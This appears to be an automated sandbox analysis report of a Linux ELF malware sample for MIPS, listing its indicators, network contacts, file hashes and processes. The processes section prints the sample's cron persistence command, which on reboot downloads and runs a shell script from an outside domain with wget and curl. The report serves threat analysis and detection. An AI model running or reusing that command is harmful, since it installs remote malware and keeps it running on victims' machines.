Analysis Overview
SHA256
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
Threat Level: Shows suspicious behavior
The file 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf was found to show suspicious behavior.
Malicious Activity Summary
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Renames itself
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:02
Reported
2024-10-27 02:04
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
139s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Destination IP | 81.169.136.222 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /var/spool/cron/crontabs/tmp.XSZqxU | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A |
Reads runtime system information
Processes
/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| DE | 81.169.136.222:53 | kingstonwikkerink.dyn | udp |
| CZ | 195.133.92.51:17892 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.XSZqxU
| MD5 | 68130ff0ed9a7764cd371c8e6baa6210 |
| SHA1 | d82a9fc5bdb2d9f1cee0bd8458c1f3e94255f3d3 |
| SHA256 | 3bc09503863de8ab831cfaa97b2f03120397fdaa453c39d3db16f32a0124e462 |
| SHA512 | a344d6280beb8e6a2af5740eb256947e5153210f4fb81c28db5d356cf8189e1bb9719e854a8a94b251506393cdcf2ef4e8e039b345dc0d2f951121627e9245aa |